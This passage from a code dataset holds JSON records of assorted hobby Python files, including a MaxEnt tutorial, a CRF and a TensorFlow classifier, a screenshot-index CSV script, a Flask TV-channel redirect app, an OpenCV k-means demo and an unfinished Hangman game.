distribution,计算关于模型分布的期望\n    \"\"\"\n    def Ep(self):\n        ep = [0.0] * len(self.feats)\n        for record in self.trainset:\n            features = record[1:]\n            # calculate p(y|x)\n            prob = self.calprob(features)#[(0.5, 'Outdoor'), (0.5, 'Indoor')]\n\n            for f in features:\n                for w, l in prob:\n                    # only focus on features from training data.\n                    if (l, f) in self.feats:\n                        # get feature id\n                        idx = self.feats[(l, f)]\n                        # sum(1/N * f(y,x)*p(y|x)), p(x) = 1/N\n                        ep[idx] += w * (1.0 / self.size)\n\n        #E_P(f_i)\n        return ep\n\n    def _convergence(self, lastw, w):\n\n        for w1, w2 in zip(lastw, w):\n            if abs(w1 - w2) >= 0.01:\n                return False\n        return True\n\n    def train(self, max_iter=1000):\n        import pdb;pdb.set_trace()\n        self._initparams()\n        for i in range(max_iter):\n            print('iter %d ...' % (i + 1))\n            # calculate feature expectation on model distribution\n            self.ep = self.Ep()\n            self.lastw = self.w[:]\n            for i, w in enumerate(self.w):\n                #GIS算法更新公式\n                delta = 1.0 / self.M * math.log(self.ep_[i] / self.ep[i])\n                # update w\n                self.w[i] += delta\n\n            print(self.w)\n            # test if the algorithm is convergence\n            if self._convergence(self.lastw, self.w):\n                break\n\n    def calprob(self, features):\n\n        wgts = [(self.probwgt(features, l), l) for l in self.labels]#[(1.0, 'Outdoor'), (1.0, 'Indoor')]\n        Z = sum([w for w, l in wgts])#计算Z_w=sum_y{sum_i[w_i*f_i(x,y)]}\n        prob = [(w / Z, l) for w, l in wgts]#p(y|x)\n\n        return prob\n\n    def predict(self, input):\n\n        features = input.strip().split()\n        prob = self.calprob(features)\n        prob.sort(reverse=True)\n\n        return prob\n\n\nmodel = MaxEnt()\n'''\nOutdoor Sunny Happy\nOutdoor Sunny Happy Dry\nOutdoor Sunny Happy Humid\nOutdoor Sunny Sad Dry\nOutdoor Sunny Sad Humid\nOutdoor Cloudy Happy Humid\nOutdoor Cloudy Happy Humid\nOutdoor Cloudy Sad Humid\nOutdoor Cloudy Sad Humid\nIndoor Rainy Happy Humid\nIndoor Rainy Happy Dry\nIndoor Rainy Sad Dry\nIndoor Rainy Sad Humid\nIndoor Cloudy Sad Humid\nIndoor Cloudy Sad Humid\n'''\n#label={outdoor,indoor}\n#words={Sunny,Happy,Dry,Humid,Sad,Cloudy,Rainy}\n#context:15条\n\nmodel.load_data('Input/gameLocation.dat')\nmodel.train()\n","repo_name":"buyizhiyou/lihang_Tutorial","sub_path":"CH06/maxent_simple.py","file_name":"maxent_simple.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"30414782143","text":"import joblib\nfrom sklearn_crfsuite import CRF\nfrom sklearn.metrics import classification_report\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.metrics import f1_score, hamming_loss, jaccard_score, accuracy_score, log_loss\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\nfrom prepare_model_input import prepare_crf_input\n\n# Retrieve training data and labels and testing data and labels\nX_train, y_train, X_test, y_test = prepare_crf_input()\n\n# Flatten the nested lists\ny_test_flat = [label for sublist in y_test for label in sublist]\n\nmlb = MultiLabelBinarizer()\ny_test_binary = mlb.fit_transform(y_test_flat)\n\n\ndef build_crf_model():\n    crf_model = CRF(\n        algorithm='lbfgs',\n        c1=0.1,\n        c2=0.1,\n        max_iterations=100,\n        all_possible_transitions=True,\n    )\n    return crf_model\n\n\nif __name__ == \"__main__\":\n    model = build_crf_model()\n\n    model.fit(X_train, y_train)\n    joblib.dump(model, \"saved_models/crf_model.joblib\")\n\n    # Make predictions on the test set\n    y_pred = model.predict(X_test)\n\n    y_pred_flat = [label for sublist in y_pred for label in sublist]\n    y_pred_binary = mlb.transform(y_pred_flat)\n\n    # print(classification_report(y_test_binary, y_pred_binary, target_names=mlb.classes_))\n\n    # Print classification report\n    # print(classification_report(y_test, y_pred))\n\n    # Convert predictions and true labels to binary format\n    # y_test_binary = mlb.transform(y_test)\n    # y_pred_binary = mlb.transform(y_pred)\n\n    accuracy_crf = accuracy_score(y_test_binary, y_pred_binary)\n\n    loss_crf = log_loss(y_test_binary, y_pred_binary)\n\n    print(f'CRF Accuracy: {accuracy_crf:.4f}')\n    print(f'CRF Loss: {loss_crf:.4f}')\n\n    # Compute the micro-averaged F1 score\n    micro_f1 = f1_score(y_test_binary, y_pred_binary, average='micro')\n\n    # Compute Hamming Loss\n    hamming_loss_value = hamming_loss(y_test_binary, y_pred_binary)\n\n    # Compute Jaccard Similarity Score\n    jaccard_score_value = jaccard_score(y_test_binary, y_pred_binary, average='samples')\n\n    print(\"Micro-Averaged F1 Score:\", micro_f1)\n    print(\"Hamming Loss:\", hamming_loss_value)\n    print(\"Jaccard Similarity Score:\", jaccard_score_value)\n","repo_name":"Chizaram-Igolo/resume-reader","sub_path":"models/classifiers/crf.py","file_name":"crf.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"35753953182","text":"import sqlite3\r\nimport argparse\r\nimport csv\r\n\r\n'''\r\ndef open_with_db(csv_out_name, do_print):\r\n    \"\"\"Gets the url and file names using a sql query and writing it to CSV\r\n\r\n    Parameters\r\n    ----------\r\n    csv_out_name : str\r\n        The CSV file to write the urls and file names.\r\n    do_print : bool\r\n        Whether or not to print the results to stdout.\r\n\r\n    \"\"\"\r\n\r\n    cursor.execute(\"select urln.urln, urla.url, inda.archiveID, inda.urlID, inda.date, inda.succeed, indn.succeed;\")\r\n                   \"from current_index indn, archive_index inda, current_urls urln, archive_urls urla \" +\r\n                   \"where indn.archiveID = inda.archiveID \" +\r\n                   \"and indn.archiveID = urln.archiveID \" +\r\n                   \"and indn.archiveID = urla.archiveID \" +\r\n                   \"and indn.urlID = inda.urlID \" +\r\n                   \"and indn.urlID = urln.urlID \" +\r\n                   \"and indn.urlID = urla.urlID \" +\r\n                   \"and (indn.succeed = 200 or inda.succeed = 200) \" +\r\n                   \"and (indn.succeed = 302 or inda.succeed = 302)\" +\r\n                   \";\")\r\n\r\n    fetchall = cursor.fetchall()\r\n\r\n    with open(csv_out_name, 'w+') as csv_file_out:\r\n        csv_writer = csv.writer(csv_file_out, delimiter=',', quoting=csv.QUOTE_ALL)\r\n        csv_writer.writerow([\"current_url\", \"archive_url\", \"current_file_name\", \"archive_file_name\"])\r\n        \r\n        for row in fetchall:\r\n            [current_url, archive_url, archive_id, url_id, date] = row\r\n            current_filename = \"{0}.{1}.png\".format(archive_id, url_id)\r\n            archive_filename = \"{0}.{1}.{2}.png\".format(archive_id, url_id, date)\r\n            csv_writer.writerow([current_url, archive_url, current_filename, archive_filename])\r\n\r\n            if do_print:\r\n                print(\"{0}|{1}|{2}|{3}\".format(current_url, archive_url, current_filename, archive_filename))\r\n\r\n    connection.close()\r\n'''\r\n\r\ndef open_with_csv(curr_csv_name, arch_csv_name, csv_out_name, do_print):\r\n    \"\"\"Parses both index files line by line and writes the urls and file names to the output file.\r\n\r\n    Parameters\r\n    ----------\r\n    curr_csv_name : str\r\n        The CSV file with the current screenshot index.\r\n    arch_csv_name : str\r\n        The CSV file with the archive screenshots index.\r\n    csv_out_name : str\r\n        The CSV file to write the urls and file names.\r\n    do_print : bool\r\n        Whether or not to print the results to stdout.\r\n\r\n    \"\"\"\r\n\r\n    with open(curr_csv_name, \"r\") as curr_csv_file:\r\n        curr_csv_reader = csv.reader(curr_csv_file)\r\n        with open(arch_csv_name, \"r\") as arch_csv_file:\r\n            arch_csv_reader = csv.reader(arch_csv_file)\r\n\r\n            with open(csv_out_name, \"w+\") as csv_file_out:\r\n                csv_writer = csv.writer(csv_file_out, delimiter=',', quoting=csv.QUOTE_ALL)\r\n                csv_writer.writerow([\"current_url\", \"archive_url\", \"current_file_name\", \"archive_file_name\"])\r\n\r\n                next(curr_csv_reader)  # skip header\r\n                next(arch_csv_reader)\r\n                crow = next(curr_csv_reader)  # a single row in the current index file\r\n                arow = next(arch_csv_reader)\r\n\r\n                # goes through both files and gets info row by row\r\n                try:\r\n                    while True:  # how to check EOF in csv?\r\n\r\n                        [carchive_id, curl_id, curl] = crow[:3]\r\n                        cscreenshot_status = crow[-1]\r\n                        [aarchive_id, aurl_id, adate, aurl] = arow[:4]\r\n                        ascreenshot_status = arow[-1]\r\n\r\n                        curl_id = int(curl_id)\r\n                        aurl_id = int(aurl_id)\r\n\r\n                        if curl_id > aurl_id or ascreenshot_status != \"Screenshot successful\":\r\n                            arow = next(arch_csv_reader)\r\n                        elif curl_id < aurl_id or cscreenshot_status != \"Screenshot successful\":\r\n                            crow = next(curr_csv_reader)\r\n                        else:\r\n                            current_filename = \"{0}.{1}.png\".format(carchive_id, curl_id)\r\n                            archive_filename = \"{0}.{1}.{2}.png\".format(aarchive_id, aurl_id, adate)\r\n                            csv_writer.writerow([curl, aurl, current_filename, archive_filename])\r\n\r\n                            if do_print:\r\n                                print(\"{0}, {1}, {2}, {3}\".format(curl, aurl, current_filename, archive_filename))\r\n\r\n                            arow = next(arch_csv_reader)\r\n\r\n                except StopIteration:\r\n                    pass\r\n\r\n\r\ndef connect_sql(path):\r\n    \"\"\"Connects the DB file. \"\"\"\r\n\r\n    global connection, cursor\r\n\r\n    connection = sqlite3.connect(path)\r\n    cursor = connection.cursor()\r\n    connection.commit()\r\n\r\n\r\ndef parse_args():\r\n    \"\"\"Parses the command line arguments\r\n\r\n    Returns\r\n    -------\r\n    use_csv : bool\r\n        Whether or not the input is a CSV.\r\n    use_db : bool\r\n        Whether or not the input is a DB.\r\n    curr_csv_name : str\r\n        The CSV file with the current screenshot index.\r\n    arch_csv_name : str\r\n        The CSV file with the archive screenshots index.\r\n    csv_out_name : str\r\n        The CSV file to write the urls and file names.\r\n    do_print : bool\r\n        Whether or not to print the results to stdout.\r\n\r\n    \"\"\"\r\n\r\n    parser = argparse.ArgumentParser()\r\n\r\n    # initializing every line switch\r\n    parser.add_argument(\"--currcsv\", type=str, help=\"The CSV file with the current screenshots index\")\r\n    parser.add_argument(\"--archcsv\", type=str, help=\"The CSV file with the archive screenshots index\")\r\n    parser.add_argument(\"--db\", type=str, help=\"Input DB file with urls\")\r\n    parser.add_argument(\"--out\", type=str, help=\"The CSV file to write the urls and file names\")\r\n    parser.add_argument(\"--print\", action='store_true',\r\n                        help=\"(optional) Include to print urls and file names to stdout, default doesn't print\")\r\n\r\n    args = parser.parse_args()\r\n\r\n    # some parameters checking\r\n    if args.currcsv is None and args.archcsv is None and args.db is None:\r\n        print(\"Must provide input file\\n\")\r\n        exit()\r\n    if args.db is not None and not (args.currcsv is None and args.archcsv is None):\r\n        print(\"Must only use only one type of input file\\n\")\r\n        exit()\r\n    if args.db is None and (args.currcsv is None or args.archcsv is None):\r\n        print(\"Must provide both current and archive index CSV files\\n\")\r\n        exit()\r\n    if args.out is None:\r\n        print(\"Must specify output file\\n\")\r\n        exit()\r\n\r\n    if args.currcsv is not None and args.archcsv is not None:\r\n        use_csv = True\r\n        curr_csv_name = args.currcsv\r\n        arch_csv_name = args.archcsv\r\n    else:\r\n        use_csv = False\r\n        curr_csv_name = None;\r\n        arch_csv_name = None;\r\n\r\n    if args.db is not None:\r\n        use_db = True\r\n        connect_sql(args.db)\r\n    else:\r\n        use_db = False\r\n\r\n    csv_out_name = args.out\r\n    do_print = args.print\r\n\r\n    return use_csv, use_db, curr_csv_name, arch_csv_name, do_print, csv_out_name\r\n\r\n\r\ndef main():\r\n    use_csv, use_db, curr_csv_name, arch_csv_name, do_print, csv_out_name = parse_args()\r\n    if use_csv:\r\n        open_with_csv(curr_csv_name, arch_csv_name, csv_out_name, do_print)\r\n    if use_db:\r\n        open_with_db(csv_out_name, do_print)\r\n\r\n\r\nmain()\r\n","repo_name":"reyesayala/wa_screenshot_compare","sub_path":"get_file_names_withDB.py","file_name":"get_file_names_withDB.py","file_ext":"py","file_size_in_byte":7417,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"}
{"seq_id":"71270003985","text":"\ndef solution(stationA, stationB, stationC, origin, dest):\n\trouteMap = {}\n\n\tfor i in stationA:\n\t\tif i not in routeMap:\n\t\t\trouteMap[i] = \"A\"\n\n\tfor i in stationB:\n\t\tif i not in routeMap:\n\t\t\trouteMap[i] = \"B\"\n\n\tfor i in stationC:\n\t\tif i not in routeMap:\n\t\t\trouteMap[i] = \"C\"\n\n\tif origin not in routeMap or dest not in routeMap:\n\t\treturn \"\"\n\n\tprint(routeMap[origin], routeMap[dest])\n\n\t# import pdb\n\t# pdb.set_trace()\n\n\tif (routeMap[origin] == \"A\" and routeMap[dest] == \"B\") or (routeMap[origin] == \"B\" and routeMap[dest] == \"A\"):\n\t\treturn \"AB\"\n\n\tif (routeMap[origin] == \"A\" and routeMap[dest] == \"A\") or (routeMap[origin] == \"B\" and routeMap[dest] == \"B\"):\n\t\treturn \"AB\"\n\n\tif (routeMap[origin] == \"B\" and routeMap[dest] == \"C\") or (routeMap[origin] == \"C\" and routeMap[dest] == \"B\"):\n\t\treturn \"BC\"\n\n\tif (routeMap[origin] == \"C\" and routeMap[dest] == \"C\"):\n\t\treturn \"BC\"\n\n\tif (routeMap[origin] == \"A\" and routeMap[dest] == \"C\") or (routeMap[origin] == \"C\" and routeMap[dest] == \"A\"):\n\t\treturn \"ABC\"\n\n\treturn \"\"\n\n\nstationA = [\"Green Park\", \"Holdborn\"]\nstationB = [\"Mile End\", \"Bow Road\"]\nstationC = [\"Forest Hill\", \"Balham\"]\n\n# origin = \"Forest Hill\"\n\n# dest = \"Green Park\"\n\norigin = \"Forest Hill1\"\n\ndest = \"Green Park\"\n\nprint(solution(stationA, stationB, stationC, origin, dest))\n","repo_name":"ganeshparsads/OAs","sub_path":"roblox/station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"33745618012","text":"\"\"\"\n@ binary classification using wide 2-layered net implemented with tensorflow\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport time\nimport os.path\n\ndef loadSamples(m, fileName):\n    if not os.path.exists(fileName):\n        return generateSamples(m, fileName)\n\n    with open(fileName, 'r') as f:\n        lines = f.readlines()\n\n    X = []\n    for line in lines[:-1]:\n        X.append(line.split())\n\n    Y = lines[-1].split()\n\n    return [np.array(X, dtype=np.float128), np.array(Y, dtype=int)]\n\ndef saveSamples(X, Y, fileName):\n    lines = \"\"\n\n    for i in range(len(X)):\n        for j in range(len(X[0])):\n            lines += str(X[i][j]) + \" \"\n        \n        lines = lines[:-1] + \"\\n\"\n\n    for i in range(len(Y)):\n        lines += str(Y[i]) + \" \"\n    lines = lines[:-1]\n\n    with open(fileName, 'w') as f:\n        f.write(lines)\n\ndef generateSamples(m, fileName):\n    x1, x2, y = [], [], []\n\n    for i in range(m):\n        x1.append(random.uniform(-10, 10))\n        x2.append(random.uniform(-10, 10))\n\n        if x1[-1] + x2[-1] > 0:\n            y.append(1)\n        else:\n            y.append(0)\n\n    X = np.array([x1, x2])\n    Y = np.array(y)\n\n    saveSamples(X, Y, fileName)\n\n    return X, Y\n\n\"\"\"\nInput: 2-dim vector, ЁЭТЩ = {ЁЭСе1, ЁЭСе2}\nOutput: label of the input, y тИИ {0,1}\n\"\"\"\nm = 10000 # the number of train sample\nn = 500 # the number of test sample\nK = 5000 # the number of update\n\nX_train, Y_train = loadSamples(m, \"train_samples.txt\")\nX_test, Y_test = loadSamples(n, \"test_samples.txt\")\n\nmodel = tf.keras.models.Sequential([\n    tf.keras.layers.Dense(3, input_shape = [2,], activation='relu'),\n    tf.keras.layers.Dense(1, activation='sigmoid')\n])\n\nmodel.compile(optimizer='sgd', loss = 'binary_crossentropy', metrics=['accuracy'])\n# model.compile(optimizer='sgd', loss = 'mse', metrics=['accuracy'])\n# model.compile(optimizer='RMSprop', loss = 'binary_crossentropy', metrics=['accuracy'])\n# model.compile(optimizer='adam', loss = 'binary_crossentropy', metrics=['accuracy'])\n\nstart = time.time()\n# model.fit(X_train.T, Y_train, epochs=K, verbose = 0)\n# model.fit(X_train.T, Y_train, epochs=K, verbose = 0, batch_size = 4)\n# model.fit(X_train.T, Y_train, epochs=K, verbose = 0, batch_size = 32)\nmodel.fit(X_train.T, Y_train, epochs=K, verbose = 0, batch_size = 128)\n\nprint(\"train time :\", time.time() - start)\n\nmodel.evaluate(X_train.T, Y_train, verbose=2)\nmodel.evaluate(X_test.T, Y_test, verbose=2)","repo_name":"unae131/DeepLearning","sub_path":"practice3.py","file_name":"practice3.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"39564825212","text":"from mongoengine import *\nfrom spaceone.core.model.mongo_model import MongoModel\n\n\nclass Provider(MongoModel):\n    provider = StringField(max_length=40, unique=True)\n    name = StringField(max_length=255)\n    template = DictField()\n    metadata = DictField()\n    capability = DictField()\n    tags = DictField()\n    created_at = DateTimeField(auto_now_add=True)\n\n    meta = {\n        'updatable_fields': [\n            'name',\n            'template',\n            'metadata',\n            'capability',\n            'tags'\n        ],\n        'minimal_fields': [\n            'provider',\n            'name'\n        ],\n        'ordering': ['created_at'],\n        'indexes': [\n            # 'provider',\n        ]\n    }\n","repo_name":"cloudforet-io/identity","sub_path":"src/spaceone/identity/model/provider_model.py","file_name":"provider_model.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"}
{"seq_id":"4352639131","text":"from utils import circle_to_oval\nfrom collections import deque\nfrom tkinter import Canvas\nfrom utils import distance_eucl, vec_2D\n\ndef pos_suiv(xi:float, yi: float, xj_1: float, yj_1: float, dist:float):\n    \"\"\" Calcul de la position des boules\"\"\"\n    # Comme la distance est une constante on la passe\n    # directement en parametre\n    # On normalise le vecteur unitaire\n    u = vec_2D(xi, yi, xj_1, yj_1)\n    norm = distance_eucl(xi, yi, xj_1, yj_1)\n    # On applique la distance constante\n    u = dist*u[0]/norm, dist*u[1]/norm\n    # On soustrait pour obtenir la bonne position\n    return xj_1-u[0], yj_1-u[1]\n\n\n\nclass Chenille_2D:\n    def __init__(self, x0: float, y0: float, size:int, canva: Canvas, cote: int) -> None:\n        self.size = size\n        # Nombre de boules\n        if size <= 0:\n            raise ValueError(\"Chenille trop petite\")\n        # Canvas\n        self.Canva = canva\n        if canva is None:\n            raise ValueError(\"Canvas non initialisé\")\n        # Taille du carre dans le canvas\n        self.cote = cote\n        if cote is None:\n            raise ValueError(\"taille des carrés non initialisée\")\n        # Tableau pour stocker l'id des boules\n        self.chenille_id =[]\n        # File pour récupérer les point des bézier courants\n        self.flux = deque()\n        # Distance constantes entre chaque boules\n        self.dcst = []\n        self.pos = []\n        # Position des boules\n        # Initialisation des boules\n        x0, y0 = x0-2, y0-2\n        for i in range(self.size):\n            dist = 1*i*0.05+0.175\n            rayon = dist*self.cote\n            xy_xy = circle_to_oval(x0*self.cote+self.cote/2, y0*self.cote+self.cote/2, rayon)\n            self.chenille_id.append((self.Canva.create_oval(*xy_xy, fill=\"Green\", state=\"normal\", tags=\"chenille\")))\n            self.pos.append((x0, y0))\n            self.dcst.append(dist)\n    \n    \n    def deplacement(self, xj_1: float, yj_1: float):\n        \"\"\"\n        Calcule les déplacements relatifs entre tous les points dans\n        le flux\n        \"\"\"\n        # Déplacement de la tête\n        # Calcul du vecteur tête\n        dx, dy = xj_1-self.pos[-1][0], yj_1-self.pos[-1][1]\n        # On multiplie par la taille des carres pour avoir les bons repères\n        self.Canva.move(self.chenille_id[-1],dx *self.cote, dy*self.cote)\n        self.pos[-1] = xj_1, yj_1\n        idx = -2\n        while(idx > (-self.size)-1):\n            # On récupère la position de la prochaine boule\n            xj_1, yj_1 = self.pos[idx+1]\n            xi, yi = self.pos[idx]\n            cste = self.dcst[idx]\n            # On calcule la position de la prochaine boule\n            xj, yj = pos_suiv(xi, yi, xj_1, yj_1, cste)\n            self.pos[idx] = xj, yj\n            dx, dy = xj-xi, yj-yi\n            self.Canva.move(self.chenille_id[idx], dx *self.cote, dy*self.cote)\n            \n            idx -= 1\n\n    def delete(self):\n        self.Canva.delete(\"chenille\")\n        self.chenille_id = []\n        self.pos = []\n        self.dcst = []\n        self.Canva = None\n\n    \n\n    \n\n\n","repo_name":"oliveur83/projet","sub_path":"chemin le plus court/chenille_2D.py","file_name":"chenille_2D.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"35647049949","text":"from ..graphics import Canvas\nfrom ..graphics.shapes import Text, Square\n\nclass Legend (Canvas):\n    def __init__ (self, **attr):\n        Canvas.__init__ (self, **attr)\n        if attr.has_key ('textHeight'):\n            self.textHeight = attr['textHeight']\n        else:\n            self.textHeight = 10\n        self.side1 = 0\n        self.side2 = 0\n        #self.lineWidth = self.width / 2.0 - 30.0\n        self.height = 0.0\n        self.lineWidth = self.width - 30\n    \n    def addKey (self, key, color):\n        currentX = 0.0\n        s = Square (8, x = currentX + 10, y = self.height)\n        s.style.fill = color\n        self.draw (s)\n        line = Text (text = key,\n                     x = currentX + 20,\n                     y = self.height,\n                     textHeight = self.textHeight,\n                     lineLength = self.lineWidth,\n                     maxLines = 2,\n                     direction = 'forward',\n                     )\n        self.draw (line)\n        self.height += line.height + 3\n        \"\"\"if self.side1 <= self.side2:\n            currentX = 0\n            yValue = self.side1\n        else:\n            currentX = self.width / 2.0\n            yValue = self.side2\n        s = Square (8, x = currentX + 10, y = yValue)\n        s.style.fill = color\n        self.draw (s)\n        line = Text (text = key,\n                     x = currentX + 20,\n                     y = yValue,\n                     textHeight = self.textHeight,\n                     lineLength = self.lineWidth,\n                     direction = 'forward',\n                     )\n        if self.side1 <= self.side2:\n            self.side1 += line.height + 3\n        else:\n            self.side2 += line.height + 3\n        self.draw (line)\n        self.height = max (self.side1, self.side2)\"\"\"\n","repo_name":"dotskapes/dotSkapes","sub_path":"modules/savage/graph/legend.py","file_name":"legend.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"}
{"seq_id":"36745522210","text":"import logging\n\nimport flask\nfrom flask import Response\n\nfrom lebanese_channels.channel_ids import CHANNEL_LIST\nfrom lebanese_channels.display_item import DisplayItem\n\napp = flask.Flask(__name__)\n\nlogger = logging.getLogger(__name__)\n\n\n@app.route('/channel/')\ndef channel_route_default(name):\n    return __channel_stream(name)\n\n\n@app.route('/channels')\ndef channels_route_default():\n    return __get_channels_response_lines(flask.request.url_root, flask.request.args.get('format'))\n\n\ndef __channel_stream(target):\n    for channel in CHANNEL_LIST:\n        if channel.get_route_name() == target:\n            url = channel.get_stream_url()\n            return flask.redirect(url, code=302)\n\n\ndef __get_channels_response_lines(host: str, result_format: str) -> Response:\n    display_items = []\n\n    for channel in CHANNEL_LIST:\n        url = host + 'channel/' + channel.get_route_name()\n        display_items.append(\n            DisplayItem(channel.get_route_name(), channel.get_name(), url, channel.get_logo()))\n\n    if result_format is None or result_format == 'm3u8':\n        response_list = ['#EXTM3U']\n        for display_item in display_items:\n            response_list.append('#EXTINF:-1'\n                                 + ' tvg-id=\"' + display_item.channel_short_name + '\"'\n                                 + ' tvg-logo=\"' + display_item.channel_logo + '\"'\n                                 + ', ' + display_item.channel_name\n                                 + '\\n'\n                                 + display_item.channel_url)\n\n        return Response('\\n'.join(response_list), mimetype='application/vnd.apple.mpegurl')\n    elif result_format == 'html':\n        response_list = []\n\n        response_list.append('')\n        response_list.append('')\n\n        response_list.append('')\n        response_list.append('Channel List')\n        response_list.append('')\n\n        response_list.append('')\n        response_list.append('')\n        response_list.append('')\n        response_list.append('')\n        return Response('\\n'.join(response_list), mimetype='text/html')\n    else:\n        return Response('Unknown Format', mimetype='text/plain')\n","repo_name":"ChadiEM/Lebanese-Channels","sub_path":"lebanese_channels/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"}
{"seq_id":"30610893825","text":"# DATE: 10/09/2022, 05:55:16\n# PROBLEM NAME: The Great Run\n# PROBLEM URL: https://www.codechef.com/problems/PROC18A\n# PROBLEM DIFFICULTY RATTING: 1097\n# STATUS: accepted\n# TIME: 0.02\n# MEMORY: 9.6M\n\nfor _ in range(int(input())):\r\n    n, k = map(int, input().split())\r\n    g = list(map(int, input().split()))\r\n    max_g = 0\r\n    for i in range(n-1):\r\n        total = sum(g[i:k+i])\r\n        if total > max_g:\r\n            max_g = total\r\n\r\n    print(max_g)\r\n\r\n\n\n","repo_name":"Yash2003Bisht/ProblemSolutions","sub_path":"solutions/codechef/PROC18A/PROC18A_1.py","file_name":"PROC18A_1.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"3705591911","text":"import cv2\nimport numpy as np\n\nimage = cv2.imread( 'test.jpg' )\n\nsamples = image.reshape( ( -1 , 3 ) )\nsamples = np.float32( samples )\n\nK = 8\ncriteria = ( cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER , 10 , 1.0 )\nattempts = 10\nflags = cv2.KMEANS_RANDOM_CENTERS\n\nretval, bestLabels, centers = cv2.kmeans( samples , K , None , criteria , attempts , flags )\n\ncenters = np.uint8( centers )\nresult = centers[ bestLabels.flatten() ]\nresults = result.reshape( ( image.shape ) )\n\ncv2.imshow( 'K-Means Clustering' , results )\n\ncv2.waitKey( 0 )\ncv2.destroyAllWindows()\n","repo_name":"sangyoon/opencv","sub_path":"python/ColorQuantization.py","file_name":"ColorQuantization.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"16104619597","text":"\nimport random\nimport string\n\n\"\"\"from operator import truediv\nimport random\n\n\nclass Hangman:\n    def __init__(self, word_list, num_lives=5):\n        pass\n        # initiaise wordlist \n        word_list=[]\n        self.word_list=word_list\n        # initialise numlives\n        num_lives=5\n        # initialise word\n        word=\"\"\n        # initialise word guessed \n        word_guessed=[]\n        self.word_guessed=word_guessed\n        # initialise numlives \n        self.num_lives=num_lives\n        # initialise list letters \n        list_letters=[]\n        print(\"The mystery word has {len(self.word)} characters\")\n        print(word_guessed)\n\n    def check_letter(self, letter):\n        pass\n        # change letter to lowercase and assign to variable called letter\n        #%%\n        letter=letter.lower()\n        # check if the letter is in the word: \n        # print (letter is in the word)\n        if letter in word:\n            print(\"letter is in the word\")\n\n            for i in word:\n                if letter==word[i]:\n                    word[i]=letter\n            print(word)\n        \"\"\"\"\"\"\n        else:\n            num_lives=num_lives-1\n            list_letters= list_letters.append(letter)\n\n        #range function, letter = index of word\n        # \n\n\n\n\n\n        # create a for loop that checks for the position and character of the letters in the word:\n        #check if the character == letter:\n        # assign the letter to the word guessed at that position\n        #print the word guessed \n        # reduce the numbr of letters by 1 \n        #else:\n        #reduce number of lives by 1\n        # append the letter into the list of letters \n\n\n\n    \n\n\n    def ask_letter(self):\n        pass\n        #take an input from the user and asssign it to letter\n        #%%\n        \n        letter=input(\"Please enter a letter\")\n        #check if len(letter)!=1 and not letter.isalpha: \n        # enter the correct input\n        if len(letter)!=1 or not letter.isalpha:\n            letter=input(\"Please, enter just one character\")\n        #check if the letter has been already tried (in the list of letters):\n        # print (that letter has already been tried)\n        if letter in list_letters:\n            print( \"the letter\" + letter + \"has already been tried\")\n            letter=input(\"Please enter a single letter that you have not already tried\")\n        #call check letter method (letter as an argument) \n        check_letter(letter)\n        \n\ndef play_game(word_list):\n    # create an instance of the class\n    ask_letter(self)\n    \n    pass\n    game = Hangman(word_list, num_lives=5)\n\nif __name__ == '__main__':\n    word_list = ['apple', 'banana', 'orange', 'pear', 'strawberry', 'watermelon']\n    play_game(word_list)\n\n\"\"\"\n\n\n\n\n\n#milestone 2\n#word_list = ['apple','banana','kiwi','avocado','orange']\n#print(word_list)\n#word = random.choice(word_list)\n#print(word)\n\"\"\"guess = input(\"Please enter a character\")\nprint(guess)\nif len(guess)==1 and guess.isalpha:\n    print(\"good guess\")\nelse:\n    print(\"Oops! That is not a valid input\")\"\"\"\n\n\n#milestone 3 \n\"\"\"\"\nwhile True:\n    guess = input(\"Please enter a character\")\n    if len(guess)==1 and guess.isalpha:\n        print(\"good guess\")\n        break\n    else:\n        print(\"Invalid letter. Please, enter a single alphabetical character.\")\n\nif guess in word:\n    print(f\"Good guess! {guess} is in the word.\")\nelse:\n    print(f\"Sorry, {guess} is not in the word. Try again\")\n\"\"\"\n\n\n\"\"\" while True:\n    if len(guess)==1 and guess.isalpha and guess in word:\n        print(f\"Good guess! {guess} is in the word.\")\n        break\n    elif len(guess)==1 and guess.isalpha and guess not in word:\n        print(f\"Sorry, {guess} is not in the word. Try again\")\n    else:\n        print(\"Invalid letter. Please, enter a single alphabetical character.\")\"\"\"\n\n\n\n\"\"\"def check_guess(guess):\n    guess = guess.lower()\n    if guess in word:\n        print(f\"Good guess! {guess} is in the word.\")\n    else:\n        print(f\"Sorry, {guess} is not in the word. Try again\")\ncheck_guess\n\ncheck_guess = check_guess(word)\n    \n\ndef ask_for_input():\n    while True:\n        guess = input(\"Please enter a character \")\n        if len(guess)==1 and guess.isalpha():\n            print(\"good guess\")\n            break\n        else:\n            print(\"Invalid letter. Please, enter a single alphabetical character.\")\n    \n    check_guess(guess)\n\nask_for_input()\"\"\"\n\n#works perfect until now\n#milestone 4\n\nclass Hangman:\n\n  